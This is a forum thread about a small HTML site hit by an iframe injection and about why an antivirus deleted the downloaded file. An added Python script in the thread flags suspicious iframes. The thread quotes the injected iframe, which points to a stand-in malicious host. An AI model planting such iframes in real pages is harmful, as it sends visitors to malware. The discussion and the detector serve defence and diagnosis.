Someone I don't do hosting for got hacked and Google sent them a warning message - it's just a one page site in html with pics in a jquery gallery.

So... I downloaded the html file to see what was in there and it was the iframe hack - a one liner that pointed to a malicious site.

OK... but how come when I downloaded the file with Filezilla, MS Security Essentials immediately deleted the file?
(I switched it off to get the file)
That means MS Sec must be scanning new files on the computer and following links.
Seems weird that it's following links in a file sat on my hard disk... is that what you'd expect?

    It wouldn't have to follow the links; it would only have to recognize that malicious code was present in the file ... seems expected behavior to me.

      It could very well be validating the URL against a database of bad URLs?

        cretaceous;11041329 wrote:

        No, that's the point - there was no malicious code in the html
        there was only this:
        <iframe src="http://www.nastysite.com/nastyfile.php?nastiness=yesplease"></iframe>

        If that site is indeed known for causing malware to be downloaded, then you're wrong - there was malicious code in the HTML. Hence why it was deleted.

        EDIT: It's analogous as to why an actual trojan/virus/whatever in .exe form is deleted before you execute it. An .exe file itself won't wreak havoc on your computer before you execute it... it's just a collection of machine code at that point. But a good virus scanner isn't going to wait until after you've been allowed to shoot yourself in the foot (i.e. run the .exe or load the iframe to the malicious site) in order to try and delete the file.
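The post above makes the key point: a scanner never has to fetch the iframe target, it only has to recognise the reference to a known-bad host (or, more generally, an iframe pulling content from a third-party host the page has no business embedding). The following script is an added example of that static check, not code from the thread or from Microsoft Security Essentials. The `BAD_HOSTS` reputation list and the sample gallery page are constructed for illustration; `www.nastysite.com` is the host from the quoted iframe. The hidden-iframe heuristic goes a little beyond the thread, since injected iframes are often sized to zero so visitors never see them.

```python
"""Static scan of an HTML file for injected/suspicious iframes.

Added example (not from the original thread or from any AV vendor).
Shows that flagging the injected iframe needs no network access:
parse the file, collect <iframe> src attributes and compare the host
against a reputation list or the site's own host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for a vendor's bad-URL/host database.
BAD_HOSTS = {"www.nastysite.com"}

# Constructed sample: a one-page gallery with an injected iframe added.
SAMPLE_HTML = """<html><body>
<h1>Gallery</h1>
<div id="gallery"><img src="pics/1.jpg"><img src="pics/2.jpg"></div>
<iframe src="http://www.nastysite.com/nastyfile.php?nastiness=yesplease"></iframe>
<iframe src="http://www.example.com/legit.html"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lowercases tag names
            self.iframes.append(dict(attrs))


def scan_html(html, own_host):
    """Return [(src, [reasons...]), ...] for each suspicious iframe.

    own_host is the hostname the page legitimately lives on, so iframes
    that embed the site's own content are not reported.  Relative srcs
    (no host) are treated as same-site.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        style = (attrs.get("style") or "").replace(" ", "").lower()
        reasons = []
        if host in BAD_HOSTS:
            reasons.append("known-bad host")
        elif host and host != own_host:
            reasons.append("third-party iframe")
        # Injected iframes are frequently hidden or sized to zero.
        if ("display:none" in style or "visibility:hidden" in style
                or attrs.get("width") == "0" or attrs.get("height") == "0"):
            reasons.append("hidden iframe")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in scan_html(SAMPLE_HTML, "www.example.com"):
        print(f"{', '.join(reasons)}: {src}")
```

Run against the constructed sample the script reports only the `www.nastysite.com` iframe; the iframe to the site's own host passes. In practice the reputation list would be the vendor's feed and `own_host` the domain of the site being checked, which is all the information needed to reproduce the detection without ever requesting the malicious URL.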

          I use MSE everywhere and I have come across this many times when trying to deal with malware on websites. It's expected behaviour.
